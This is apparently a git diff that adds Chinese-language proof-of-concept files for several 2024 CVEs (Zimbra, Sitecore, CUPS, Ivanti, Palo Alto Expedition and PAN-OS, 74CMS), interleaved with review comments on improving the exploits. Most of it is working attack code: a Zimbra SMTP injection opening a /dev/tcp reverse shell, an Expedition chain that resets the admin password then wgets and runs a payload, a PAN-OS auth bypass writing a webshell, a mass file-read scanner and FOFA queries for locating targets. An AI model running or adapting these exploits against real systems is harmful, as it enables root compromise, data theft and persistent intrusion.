mode 100644 index 0000000..044a7a6 --- /dev/null +++ b/CVE-2024-2561.md 
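Review bot: In CVE-2024-22024.md the line `xml_payload_template = """ %xxe;]>"""` is not a usable XXE body: the `<?xml ...?>` declaration, `<!DOCTYPE` and the `<!ENTITY % xxe SYSTEM "{}">` parameter-entity declaration with the `{}` placeholder were stripped on extraction, so `xml_payload_template.format(attacker_url + "/test")` has nothing to fill and the script posts a fragment to `/dana-na/auth/saml-sso.cgi`. Restore the full DOCTYPE and entity declaration. Two smaller points: `except Exception as e:` discards `e` in the message it prints, and the script prints whatever status code comes back as if it were a result; the evidence of the XXE is the callback on the attacker URL, which the 使用 section should say.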
@@ -0,0 +1,44 @@ +# 74CMS存在任意文件上传漏洞(CVE-2024-2561) + +74CMS存在任意文件上传漏洞(CVE-2024-2561),漏洞地址存在与sendCompanyLogo文件中/controller/company/Index.php#sendCompanyLogo的组件Company Logo Handler。经修改后的参数:imgBase64恶意代码输入可导致rce。 + +## fofa + +```javascript +app="骑士-74CMS" +``` + +## poc + +```javascript +POST /v1_0/company/index/sendCompanyLogo HTTP/1.1 +Host: localhost:7888 +Cache-Control: max-age=0 +sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "macOS" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +user-token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MDk4MTY4MDcsImV4cCI6MTc0MTAyODgwNywiaW5mbyI6eyJ1aWQiOjEsInV0eXBlIjoxLCJtb2JpbGUiOiIxNTIxMjM0NTY3OCJ9fQ.8MYJ6e8qOGCR6s3pTIlFLsWFgAhC4f-F8XH_VNaC5BQ +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Cookie: qscms_visitor=%7B%22utype%22%3A1%2C%22mobile%22%3A%2215212345678%22%2C%22token%22%3A%22eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MDk4MTY4MDcsImV4cCI6MTc0MTAyODgwNywiaW5mbyI6eyJ1aWQiOjEsInV0eXBlIjoxLCJtb2JpbGUiOiIxNTIxMjM0NTY3OCJ9fQ.8MYJ6e8qOGCR6s3pTIlFLsWFgAhC4f-F8XH_VNaC5BQ%22%7D +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 56 + +imgBase64=data:image/php;base64,PD9waHAgcGhwaW5mbygpOw== +``` + +![image-20250206164242391](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502061642460.png) + + + +## 漏洞来源 + +- https://gist.github.com/Southseast/9f5284d8ee0f6d91e72eef73b285512a \ No newline at end of file diff --git a/CVE-2024-45519.md b/CVE-2024-45519.md new file mode 100644 index 0000000..a68b103 --- /dev/null 
+++ b/CVE-2024-45519.md 
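Review bot: In CVE-2024-2561.md the request carries a `user-token` JWT and a `qscms_visitor` cookie copied from the author's instance (`localhost:7888`, uid 1, mobile 15212345678), but the text does not say that a logged-in company account is required, so the finding reads as unauthenticated when it is a post-auth upload. State the precondition and that the token must be replaced. The text should also say where the uploaded file lands and how the response reveals its path, since the base64 body (`<?php phpinfo();`) is only useful once the stored file's URL is known. "漏洞地址存在与" should be "存在于".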
@@ -0,0 +1,183 @@ +# Zimbra远程命令执行漏洞(CVE-2024-45519) + +CVE-2024-45519 是 Zimbra Collaboration (ZCS) 中的一个漏洞,Zimbra Collaboration (ZCS) 8.8.15 补丁 46 之前的版本、9.0.0 补丁 41 之前的 9、10.0.9 之前的 10 以及 10.1.1 之前的 10.1 中的期刊后服务有时允许未经身份验证的用户执行命令。 + +## fofa + +```javascript +icon_hash="1624375939" +``` + +## poc + +```python +import time +import base64 +import socket +import threading +import pwncat.manager +import rich_click as click + +from pwn import * +from faker import Faker + + +class SMTPExploit: + def __init__(self, target, port, lhost, lport): + self.target = target + self.port = port + self.lhost = lhost + self.lport = lport + self.mail_from = self.generate_random_email() + self.rcpt_to = self.generate_random_email() + self.sock = None + self.command = self.generate_base64_revshell() + + def generate_random_email(self): + fake = Faker() + return fake.email() + + def generate_base64_revshell(self): + revshell = f"/bin/bash -i 5<> /dev/tcp/{self.lhost}/{self.lport} 0<&5 1>&5 2>&5" + base64_revshell = base64.b64encode(revshell.encode()).decode() + + payload = f"echo${{IFS}}{base64_revshell}|base64${{IFS}}-d|bash" + return payload + + def generate_injected_rcpt_to(self): + return f'"aabbb$({self.command})@{self.rcpt_to}"' + + def connect(self): + try: + self.sock = remote(self.target, self.port) + banner = self.sock.recv(4096) + log.info(f"Banner received: {banner.decode().strip()}") + except Exception as e: + log.error(f"Failed to connect to SMTP server: {e}") + self.clean_exit() + + def send_smtp_command(self, command): + try: + self.sock.sendline(command.encode()) + response = self.sock.recv(4096).decode().strip() + log.info(f"Response: {response}") + return response + except EOFError: + log.error("Connection closed by the server.") + self.clean_exit() + except Exception as e: + log.error(f"Error sending command '{command}': {e}") + self.clean_exit() + + def clean_exit(self): + """Close the socket and stop the listener in case of failure""" + if self.sock: + 
self.sock.close() + log.info("Connection closed") + listener.listener_event.set() + log.error("Exploitation failed, exiting.") + exit(1) + + def run(self): + log.info(f"Connecting to SMTP server {self.target}:{self.port}...") + self.connect() + + self.send_smtp_command("EHLO localhost") + + self.send_smtp_command(f"MAIL FROM: <{self.mail_from}>") + + injected_rcpt_to = self.generate_injected_rcpt_to() + self.send_smtp_command(f"RCPT TO: <{injected_rcpt_to}>") + + self.send_smtp_command("DATA") + + self.sock.sendline("Test message".encode()) + self.sock.sendline(".".encode()) + data_response = self.sock.recv(4096).decode().strip() + log.info(f"Response after data: {data_response}") + + self.send_smtp_command("QUIT") + + self.sock.close() + log.success("Exploitation completed successfully!") + + +class Listener: + def __init__(self, bind_host, bind_port): + self.bind_host = bind_host + self.bind_port = bind_port + + def start_listener(self): + try: + with socket.create_server((self.bind_host, self.bind_port)) as listener: + log.info(f"Listening on {self.bind_host}:{self.bind_port}...") + listener.settimeout(1) + while True: + try: + client, addr = listener.accept() + log.success(f"Received connection from {addr[0]}:{addr[1]}") + with pwncat.manager.Manager() as manager: + manager.create_session( + platform="linux", protocol="socket", client=client + ) + manager.interactive() + break + except socket.timeout: + continue + except Exception as e: + log.error(f"Failed to start listener: {e}") + + +@click.command() +@click.argument("target") +@click.option( + "-p", + "--port", + type=int, + default=25, + show_default=True, + help="SMTP port (default: 25)", +) +@click.option( + "-lh", + "--lhost", + default="0.0.0.0", + show_default=True, + help="Local host for listener", +) +@click.option( + "-lp", + "--lport", + type=int, + default=4444, + show_default=True, + help="Local port for listener", +) +def main(target, port, lhost, lport): + """Exploit the Zimbra Postjournal 
SMTP vulnerability to execute arbitrary commands.""" + listener = Listener(lhost, lport) + listener_thread = threading.Thread(target=listener.start_listener) + listener_thread.start() + + time.sleep(1) + + exploit = SMTPExploit(target, port, lhost, lport) + try: + exploit.run() + except Exception as e: + log.error(f"An error occurred during the exploit: {e}") + + listener_thread.join() + + +if __name__ == "__main__": + main() +``` + +![zimbra_rce](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410061540218.png) + + + +## 漏洞来源 + +- https://github.com/Chocapikk/CVE-2024-45519 \ No newline at end of file diff --git a/CVE-2024-46938.md b/CVE-2024-46938.md new file mode 100644 index 0000000..add6f96 --- /dev/null +++ b/CVE-2024-46938.md 
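Review bot: In CVE-2024-45519.md `SMTPExploit.clean_exit` calls `listener.listener_event.set()`, but `listener` is a local of `main()` and `Listener` defines no `listener_event`, so the failure path raises `NameError` instead of shutting the listener down; and because `start_listener` loops on `while True` with a 1 s accept timeout and no stop flag, a failed exploit leaves the thread alive and `listener_thread.join()` never returns. Give `Listener` a `threading.Event` checked by the accept loop, pass the instance into `SMTPExploit`, and replace `exit(1)` (called while a non-daemon thread is running) with setting that event. Also state that the PoC needs `pwncat-cs`, `pwntools`, `faker` and `rich_click` installed, since the imports are unusual for a one-file PoC.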
@@ -0,0 +1,213 @@ +# Sitecore未授权读取任意文件(CVE-2024-46938) + +在 Sitecore Experience Platform (XP)、Experience Manager (XM) 和 Experience Commerce (XC) 8.0 初始版本至 10.4 初始版本中发现了问题。未经身份验证的攻击者可以读取任意文件。 + +## poc + +```python +import argparse +import requests +import tldextract +import urllib3 +import re +from tqdm import tqdm +from concurrent.futures import ThreadPoolExecutor, as_completed +from datetime import datetime +from typing import List, Optional + +urllib3.disable_warnings() + +class FileDisclosureScanner: + def __init__(self): + self.results = [] + self.fixed_paths = [ + r"C:\\inetpub\\wwwroot\\sitecore\\", + r"C:\\inetpub\\wwwroot\\sitecore1\\", + r"C:\\inetpub\\wwwroot\\sxa\\", + r"C:\\inetpub\\wwwroot\\XP0.sc\\", + r"C:\\inetpub\\wwwroot\\Sitecore82\\", + r"C:\\inetpub\\wwwroot\\Sitecore81\\", + r"C:\\inetpub\\wwwroot\\Sitecore81u2\\", + r"C:\\inetpub\\wwwroot\\Sitecore7\\", + r"C:\\inetpub\\wwwroot\\Sitecore8\\", + r"C:\\inetpub\\wwwroot\\Sitecore70\\", + r"C:\\inetpub\\wwwroot\\Sitecore71\\", + r"C:\\inetpub\\wwwroot\\Sitecore72\\", + r"C:\\inetpub\\wwwroot\\Sitecore75\\", + r"C:\\Websites\\spe.dev.local\\", + r"C:\\inetpub\\wwwroot\\SitecoreInstance\\", + r"C:\\inetpub\\wwwroot\\SitecoreSPE_8\\", + r"C:\\inetpub\\wwwroot\\SitecoreSPE_91\\", + r"C:\\inetpub\\wwwroot\\Sitecore9\\", + r"C:\\inetpub\\wwwroot\\sitecore93sc.dev.local\\", + r"C:\\inetpub\\wwwroot\\Sitecore81u3\\", + r"C:\\inetpub\\wwwroot\\sitecore9.sc\\", + r"C:\\inetpub\\wwwroot\\sitecore901xp0.sc\\", + r"C:\\inetpub\\wwwroot\\sitecore9-website\\", + r"C:\\inetpub\\wwwroot\\sitecore93.sc\\", + r"C:\\inetpub\\wwwroot\\SitecoreSite\\", + r"C:\\inetpub\\wwwroot\\sc82\\", + r"C:\\inetpub\\wwwroot\\SX93sc.dev.local\\", + r"C:\\inetpub\\SITECORE.sc\\", + r"C:\\inetpub\\wwwroot\\" + ] + + def attempt_absolute_path_leak(self, base_url: str) -> Optional[str]: + """Attempt to discover absolute path through POST request.""" + path_discovery_endpoint = 
f"{base_url}/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.ValidateXHtml?hdl=a" + headers = { + "Accept": "*/*", + "Accept-Encoding": "gzip, deflate, br", + "Accept-Language": "en-US;q=0.9,en;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36", + "Connection": "close", + "Cache-Control": "max-age=0", + "Content-Type": "application/x-www-form-urlencoded" + } + data = "__PAGESTATE=/../../x/x" + + try: + response = requests.post(path_discovery_endpoint, headers=headers, data=data, verify=False, timeout=5) + if response.status_code == 500: + match = re.search(r"Could not find a part of the path '([^']+)'", response.text) + if match: + absolute_path = match.group(1) + print(f"[+] Discovered absolute path for {base_url}: {absolute_path}") + return absolute_path + except requests.RequestException: + pass + return None + + def generate_dynamic_paths(self, base_url: str) -> List[str]: + """Generate dynamic paths based on URL components.""" + extracted = tldextract.extract(base_url) + subdomain = extracted.subdomain + domain = extracted.domain + suffix = extracted.suffix + fqdn = f"{subdomain}.{domain}.{suffix}".strip(".") + + return [ + fr"C:\\inetpub\\{domain}.sc\\", + fr"C:\\inetpub\\{fqdn}.sc\\", + fr"C:\\inetpub\\{subdomain}.sc\\", + fr"C:\\inetpub\\{fqdn}\\", + fr"C:\\inetpub\\{subdomain}\\", + fr"C:\\inetpub\\{domain}\\", + fr"C:\\inetpub\\{domain}.sitecore\\", + fr"C:\\inetpub\\{fqdn}.sitecore\\", + fr"C:\\inetpub\\{subdomain}.sitecore\\", + fr"C:\\inetpub\\{domain}.website\\", + fr"C:\\inetpub\\{fqdn}.website\\", + fr"C:\\inetpub\\{subdomain}.website\\", + fr"C:\\inetpub\\{domain}.dev.local\\", + fr"C:\\inetpub\\{fqdn}.dev.local\\", + fr"C:\\inetpub\\{subdomain}.dev.local\\", + fr"C:\\inetpub\\{domain}sc.dev.local\\", + fr"C:\\inetpub\\{fqdn}sc.dev.local\\", + fr"C:\\inetpub\\{subdomain}sc.dev.local\\" + ] + + def send_request(self, base_url: str, path: str, 
progress_bar: tqdm) -> Optional[dict]: + """Send request to check for vulnerability.""" + test_path = f"{path}sitecore\\shell\\client\\..\\..\\..\\web.config%23.js" + payload_url = f"{base_url}/-/speak/v1/bundles/bundle.js?f={test_path}" + + try: + response = requests.get(payload_url, verify=False, timeout=5) + if response.status_code == 200 and "" in response.text: + result = { + "url": base_url, + "path": path, + "content": response.text + } + self.results.append(result) + return result + except requests.RequestException: + pass + finally: + progress_bar.update(1) + return None + + def process_url(self, base_url: str, progress_bar: tqdm) -> None: + """Process a single URL.""" + leaked_path = self.attempt_absolute_path_leak(base_url) + + if leaked_path: + leaked_path = leaked_path.replace("x\\x.txt", "") + paths_to_test = [leaked_path] + self.generate_dynamic_paths(base_url) + else: + paths_to_test = self.fixed_paths + self.generate_dynamic_paths(base_url) + + with ThreadPoolExecutor(max_workers=5) as executor: + futures = [executor.submit(self.send_request, base_url, path, progress_bar) + for path in paths_to_test] + for future in as_completed(futures): + future.result() + + def save_results(self, output_file: str) -> None: + """Save results to file.""" + if self.results: + with open(output_file, "w") as f: + for result in self.results: + f.write(f"URL: {result['url']}\n") + f.write(f"Path: {result['path']}\n") + f.write(f"Extracted File:\n{result['content']}\n\n") + + def print_results(self) -> None: + """Print all found results.""" + if self.results: + print("\n[+] Successfully exploited CVE-2024-46938 and obtained web.config:") + for result in self.results: + print(f"\nTarget: {result['url']}") + print(f"Local Path: {result['path']}") + print("-" * 50) + +def main(): + parser = argparse.ArgumentParser(description="Test for absolute path disclosure vulnerability.") + parser.add_argument("--baseurl", help="Base URL of the target (e.g., https://example.com)") + 
parser.add_argument("--inputfile", help="File containing a list of URLs, one per line") + args = parser.parse_args() + + urls = [] + if args.baseurl: + urls.append(args.baseurl) + elif args.inputfile: + with open(args.inputfile, "r") as file: + urls = [line.strip() for line in file if line.strip()] + else: + parser.error("Either --baseurl or --inputfile must be provided") + + scanner = FileDisclosureScanner() + timestamp = datetime.now().strftime("%Y%m%d-%H%M%S") + output_file = f"output-{timestamp}.txt" + + # Calculate total requests for progress bar + total_requests = len(urls) * (len(scanner.fixed_paths) + len(scanner.generate_dynamic_paths(urls[0]))) + + with tqdm(total=total_requests, desc="Scanning", unit="request") as progress_bar: + with ThreadPoolExecutor(max_workers=10) as main_executor: + futures = {main_executor.submit(scanner.process_url, url, progress_bar): url + for url in urls} + for future in as_completed(futures): + future.result() + + if scanner.results: + scanner.save_results(output_file) + print(f"\n[+] Found {len(scanner.results)} vulnerable targets") + print(f"[+] Results saved to: {output_file}") + scanner.print_results() + else: + print("\n[-] No vulnerabilities found") + +if __name__ == "__main__": + main() +``` + + + + + +## 漏洞来源 + +- https://www.assetnote.io/resources/research/leveraging-an-order-of-operations-bug-to-achieve-rce-in-sitecore-8-x---10-x +- https://nvd.nist.gov/vuln/detail/CVE-2024-46938 \ No newline at end of file diff --git a/CVE-2024-47177.md b/CVE-2024-47177.md new file mode 100644 index 0000000..a57602b --- /dev/null +++ b/CVE-2024-47177.md 
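Review bot: In CVE-2024-46938.md `send_request` decides success with `response.status_code == 200 and "" in response.text`; the empty string is contained in every body, so any 200 is recorded as a leaked `web.config`. The intended marker was evidently stripped on extraction (presumably the opening `<configuration` tag; that is an assumption) and must be restored. The progress bar total is computed from `len(scanner.fixed_paths)` even when `attempt_absolute_path_leak` succeeds and only one fixed path is tested, so the bar never completes on those targets. Smaller: `leaked_path.replace("x\\x.txt", "")` assumes the error message names the probe as `x\x.txt` while the probe posted is `/../../x/x`; explain where the `.txt` comes from or strip the last two segments with a regex instead.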
@@ -0,0 +1,64 @@ +# OpenPrinting Cups-Browsed PDD FoomaticRIPCommandLine 参数导致远程命令执行漏洞(CVE-2024-47177) + +OpenPrinting CUPS(通用Unix打印系统)是为类Unix操作系统开发的开源打印系统。它允许计算机充当打印服务器,高效管理本地和网络打印机。Cups-Browsed是CUPS系统的一部分,是一个专门用于浏览网络上其他CUPS服务器共享的远程打印机的守护进程。它可以自动发现和配置网络打印机,让用户更容易访问和使用网络上共享的打印资源,无需手动设置。 + +在Cups-Browsed 2.0.1及之前的版本中,存在一个由PPD(PostScript打印机描述)文件中的`FoomaticRIPCommandLine`参数处理不当引起的问题。攻击者可以通过创建一个恶意的IPP(互联网打印协议)服务器来利用这个漏洞,向易受攻击的Cups-Browsed实例发送精心制作的打印机信息,然后在运行易受攻击的Cups-Browsed的系统上执行任意命令。 + +参考链接: + +- +- + +## 漏洞环境 + +执行如下命令启动一个2.4.7版本CUPS服务器和2.0.1版本Cups-Browsed服务器: + +``` +docker-compose up -d +``` + +环境启动后,可以通过`http://:631`访问CUPS的web界面。 + +漏洞环境来源:https://github.com/vulhub/vulhub + +## 漏洞复现 + +首先,下载[evil-ipp-server](https://github.com/vulhub/evil-ipp-server)项目并运行[poc.py](https://github.com/vulhub/evil-ipp-server/blob/master/poc.py): + +``` +python poc.py [evil-ipp-server-ip] [target-ip] +``` + +这个脚本会在`[evil-ipp-server-ip]`上启动一个恶意的IPP服务器,并向目标机器`[target-ip]`上的Cups-Browsed服务发送一个UDP数据包。 + +一旦Cups-Browsed接收到请求,它将尝试连接到恶意的IPP服务器并。IPP服务器会返回精心构造的`printer-privacy-policy-uri`属性,该属性中包含恶意payload,其结构如下: + +```python +( + SectionEnum.printer, + b'printer-privacy-policy-uri', + TagEnum.uri +): [b'https://www.google.com/"\n*FoomaticRIPCommandLine: "' + + b'echo 1 > /tmp/I_AM_VULNERABLE' + + b'"\n*cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip'], +``` + +然后,Cups-Browsed会在`/tmp/`目录下创建一个临时PPD文件,我们的payload会被注入到这个文件中。下图是相关的Cups-Browsed日志: + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409290934881.png) + +此时,命令还未执行,因为我们需要至少一个打印任务来触发命令的执行。 + +打印任务可能来自于正常用户,也可以来自攻击者。如果TCP 631端口开发,我们可以使用浏览器访问,并找到刚才增加的恶意IPP打印机,并创建一个“打印测试页面”的打印任务。 + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409290934786.png) + +任务执行后,进入容器即可发现,`echo 1 > /tmp/I_AM_VULNERABLE`命令已经成功执行: + +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409290934588.png) + + + +## 漏洞来源 + +- 
https://github.com/vulhub/vulhub/blob/master/cups-browsed/CVE-2024-47177/README.zh-cn.md \ No newline at end of file diff --git a/CVE-2024-8190.md b/CVE-2024-8190.md new file mode 100644 index 0000000..6fd10a5 --- /dev/null +++ b/CVE-2024-8190.md 
@@ -0,0 +1,65 @@ +# Ivanti Cloud Service Appliance存在命令注入漏洞(CVE-2024-8190) + +Ivanti Cloud Service Appliance 4.6 Patch 519之前版本中存在命令注入漏洞,由于解析HTTP请求时对TIMEZONE请求参数缺乏适当的输入验证和清理,导致恶意输入可以被exec()函数执行,从而导致命令注入,经过身份验证且拥有管理员权限的威胁者可利用该漏洞远程执行任意命令。 + +## poc + +```python +#!/usr/bin/python3 +import argparse +import re +import requests +import sys +import urllib3 +from requests.auth import HTTPBasicAuth +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + + + +def exploit(url, username, password, command): + u = username + p = password + s = requests.Session() + r = s.get(f"{url}/gsb/datetime.php", auth=HTTPBasicAuth(u,p), verify=False) + m = re.search(r"name=['\"]LDCSA_CSRF['\"]\s+value=['\"]([^'\"]+)['\"]", r.text) + if m: + ldcsa = m.group(1) + print(f"[+] Got LDCSA_CSRF value: {ldcsa}") + else: + print(f"[-] Failed getting LDCSA_CRSF token") + sys.exit(0) + + payload = { + "dateTimeFormSubmitted": "1", + "TIMEZONE": f"; `{command}` ;", + "CYEAR": "2024", + "CMONTH": "9", + "CDAY": "13", + "CHOUR": "12", + "CMIN": "34", + "LDCSA_CSRF": ldcsa, + "SUBMIT_TIME": "Save" + } + print(f"[*] Sending payload...") + r = s.post(f"{url}/gsb/datetime.php", auth=HTTPBasicAuth(u,p), verify=False, data=payload) + + +if __name__ == "__main__": + parser = argparse.ArgumentParser() + parser.add_argument('-u', '--url', help='The base URL of the target', required=True) + parser.add_argument('--username', help='The application username', required=True) + parser.add_argument('--password', help='The application password', required=True) + parser.add_argument('-c', '--command', help='The command to execute blind', type=str, required=True) + args = parser.parse_args() + + exploit(args.url, args.username, args.password, args.command) +``` + + + + + +## 漏洞来源 + +- https://www.horizon3.ai/attack-research/cisa-kev-cve-2024-8190-ivanti-csa-command-injection/ +- https://github.com/lal0ne/vulnerability/tree/main/Ivanti/CVE-2024-8190 \ No newline at end of file 
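Review bot: `exploit()` calls `sys.exit(0)` on the "Failed getting LDCSA_CRSF token" path, so a failed run still exits with success status; use a non-zero exit code there (and fix the "CRSF" typo in the message). The POST to `/gsb/datetime.php` assigns `r` but never checks its status code or body, so the script gives no indication of whether the request was accepted, and since the command runs blind the README should state what a tester is expected to observe. Several `print(f"...")` calls contain no placeholders and do not need the `f` prefix. The description gives "4.6 Patch 519之前" as affected but does not name the patched release.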
diff --git a/CVE-2024-9014.md b/CVE-2024-9014.md new file mode 100644 index 0000000..4f889ee --- /dev/null +++ b/CVE-2024-9014.md @@ -0,0 +1,25 @@ +# pgAdmin4敏感信息泄露漏洞(CVE-2024-9014) + +CVE-2024-9014 pgAdmin4 敏感信息泄露 ,pgAdmin 版本 8.11 及更早版本容易受到 OAuth2 身份验证中的安全缺陷的影响。此漏洞允许攻击者获取客户端 ID 和机密,从而导致对用户数据的未经授权的访问。 + +## fofa + +```javascript +icon_hash="1502815117" +``` + +## poc + +```javascript +GET /login?next=/ HTTP/1.1 +Host: 192.168.31.135:5050 + +``` + +![1](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410061603750.png) + + + +## 漏洞来源 + +- https://github.com/EQSTLab/CVE-2024-9014 \ No newline at end of file diff --git a/CVE-2024-9464.md b/CVE-2024-9464.md new file mode 100644 index 0000000..c9b9b60 --- /dev/null +++ b/CVE-2024-9464.md 
@@ -0,0 +1,139 @@ +# Palo-Alto-Expedition经过身份验证的命令注入(CVE-2024-9464) + +Palo Alto Networks Expedition 中的操作系统命令注入漏洞允许经过身份验证的攻击者以 Expedition 中的 root 身份运行任意操作系统命令,从而导致用户名、明文密码、设备配置和 PAN-OS 防火墙的设备 API 密钥泄露。 + +## poc + +```python +#!/usr/bin/python3 +import argparse +import requests +import urllib3 +import random +import string +import sys +import socketserver +import time +import threading +from http.server import SimpleHTTPRequestHandler +from requests.exceptions import ReadTimeout +urllib3.disable_warnings() + +def _start_web_server(listen_ip, listen_port): + try: + httpd = socketserver.TCPServer((listen_ip, listen_port), SimpleHTTPRequestHandler) + httpd.timeout = 60 + httpd.serve_forever() + except Exception as e: + sys.stderr.write(f'[!] Error starting web server: {e}\n') + +def serve(): + print(f'[*] Starting web server at {args.listen_ip}:{args.listen_port}') + ft = threading.Thread(target=_start_web_server, args=(args.listen_ip,args.listen_port), daemon=True) + ft.start() + time.sleep(3) + +def reset_admin_password(url: str): + print(f'[*] Sending reset request to server...') + r = requests.post(f'{url}/OS/startup/restore/restoreAdmin.php', verify=False, timeout=30) + if r.status_code == 200: + print(f'[*] Admin password reset successfully') + else: + print(f'[-] Unexpected response during reset: {r.status_code}:{r.text}') + sys.exit(1) + + +def get_session_key(url: str): + print(f'[*] Retrieving session key...') + session = requests.Session() + data = {'action': 'get', + 'type': 'login_users', + 'user': 'admin', + 'password': 'paloalto', + } + r = session.post(f'{url}/bin/Auth.php', data=data, verify=False, timeout=30) + if r.status_code == 200: + session_key = r.headers.get('Set-Cookie') + if 'PHPSESSID' in session_key: + print(f'[*] Session key successfully retrieved') + csrf_token = r.json().get('csrfToken') + session.headers['Csrftoken'] = csrf_token + return session + + print(f'[-] Unexpected response during authentication: {r.status_code}:{r.text}') + 
sys.exit(1) + + +def add_blank_cronjob(url: str, session): + print(f'[*] Adding empty cronjob database entry...') + data = {'action': 'add', + 'type': 'new_cronjob', + 'project': 'pandb', + } + r = session.post(f'{url}/bin/CronJobs.php', data=data, verify=False, timeout=30) + if r.status_code == 200 and r.json().get('success', False): + print(f'[*] Successfully added cronjob database entry') + return + + print(f'[-] Unexpected response adding cronjob: {r.status_code}:{r.text}') + sys.exit(1) + + +def edit_cronjob(url, session, command): + print(f'[*] Inserting: {command}') + print(f'[*] Inserting malicious command into cronjob database entry...') + data = {'action': 'set', + 'type': 'cron_jobs', + 'project': 'pandb', + 'name': 'test', + 'cron_id': '1', + 'recurrence': 'Daily', + 'start_time': f'"; {command} ;', + } + try: + r = session.post(f'{url}/bin/CronJobs.php', data=data, verify=False, timeout=30) + if r.status_code == 200: + print(f'[+] Successfully edited cronjob - check for blind execution!') + return + + print(f'[-] Unexpected response editing cronjob: {r.status_code}:{r.text}') + sys.exit(1) + except TimeoutError: + # Expected to timeout given it keeps connection open for process duration + pass + except ReadTimeout: + # Expected to timeout given it keeps connection open for process duration + pass + + +if __name__ == "__main__": + parser = argparse.ArgumentParser() + parser.add_argument('-u', '--url', help='The URL of the target', type=str, required=True) + parser.add_argument('-c', '--cmd_file', help='The commands to execute blind', type=str, required=True) + parser.add_argument('-li', '--listen_ip', help='local IP to bind to') + parser.add_argument('-lp', '--listen_port', required=False, help='local HTTP port to bind to, for blind RCE mode', default=8000, type=int) + args = parser.parse_args() + + serve() + reset_admin_password(args.url) + session = get_session_key(args.url) + add_blank_cronjob(args.url, session) + filename = 
random.choice(string.ascii_letters) + cmd_wrapper = [ + f'wget {args.listen_ip}$(echo $PATH|cut -c16){args.listen_port}/{args.cmd_file} -O /tmp/(unknown)', + f'chmod 777 /tmp/(unknown)', + f'/tmp/(unknown)', + f'rm /tmp/(unknown)' + ] + for cmd in cmd_wrapper: + edit_cronjob(args.url, session, cmd) + time.sleep(1) + + +``` + + + +## 漏洞来源 + +- https://github.com/horizon3ai/CVE-2024-9464 \ No newline at end of file diff --git a/CVE-2024-9474.md b/CVE-2024-9474.md new file mode 100644 index 0000000..bfb8d5e --- /dev/null +++ b/CVE-2024-9474.md 
@@ -0,0 +1,118 @@ +# PAN-OS软件中存在权限提升漏洞(CVE-2024-9474/CVE-2024-0012) + +Palo Alto Networks PAN-OS 软件中存在权限提升漏洞,允许有权访问管理 Web 界面的 PAN-OS 管理员以 root 权限在防火墙上执行操作。 Cloud NGFW 和 Prisma Access 不受此漏洞影响。 + +## fofa + +```javascript +icon_hash="873381299" +``` + +## poc + +```python +import requests +import argparse +import urllib3 +import base64 + + +# Set up command-line argument parsing +parser = argparse.ArgumentParser(description="Send a POST request with a specified hostname.") +parser.add_argument("hostname", help="The hostname to be used in the request.") +parser.add_argument("command", help="Command to execute") +args = parser.parse_args() + + +# Assign the hostname variable +hostname = args.hostname +#lhost = args.lip +#lport = args.lport +command = args.command + +# Define the proxy configuration +proxies = { + "http": "http://localhost:8080", + "https": "http://localhost:8080", +} + +proxies = "" # comment line to go through the Burp Proxy +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + + +# Define the URL and headers +url = f"https://{hostname}/php/utils/createRemoteAppwebSession.php/watchTowr.js.map" +header1 = { + "Host": hostname, + "X-PAN-AUTHCHECK": "off", + "Content-Type": "application/x-www-form-urlencoded", +} + +# Define the payload +payload_new = ( + "user=`"+str(command)+"`" + "&userRole=superuser&remoteHost=&vsys=vsys1" +) + + +payload_orig = ( + "user=`echo $("+str(command)+") > /var/appweb/htdocs/unauth/watchTowr.php`" + "&userRole=superuser&remoteHost=&vsys=vsys1" +) + +print("POST : " + url) +try: + #print(payload) + response = requests.post(url, headers=header1, data=payload_orig, proxies=proxies, verify=False) + print("Status Code:", response.status_code) + if 'Set-Cookie' in response.headers and response.status_code == 200 : + set_cookie = response.headers['Set-Cookie'] + + # Look for the PHPSESSID in the Set-Cookie header + if 'PHPSESSID=' in set_cookie: + # Extract the PHPSESSID value + phpsessid = 
set_cookie.split('PHPSESSID=')[1].split(';')[0] + print(f"PHPSESSID: {phpsessid}") + else: + print("PHPSESSID not found in Set-Cookie header") + else: + print("'Set-Cookie' header not found in response headers") + print() +except requests.RequestException as e: + print("An error occurred:", e) + +header2 = { + "Host": hostname, + "Cookie": f"PHPSESSID={phpsessid};", + "X-PAN-AUTHCHECK": "off", + "Connection": "keep-alive" +} +url2 = f"https://{hostname}/index.php/.js.map" + +print("GET : " + url2) +try: + response2 = requests.get(url2, headers=header2, proxies=proxies, verify=False) + print("Status Code:", response2.status_code) + print() +except requests.RequestException as e: + print("An error occurred:", e) + + +url3 = f"https://{hostname}/unauth/watchTowr.php" + +print("GET : " + url3) +try: + response3 = requests.get(url3, headers=header2, proxies=proxies, verify=False) + print("Status Code:", response3.status_code) + print("Status Content:", response3.content) + +except requests.RequestException as e: + print("An error occurred:", e) +``` + + + +## 漏洞来源 + 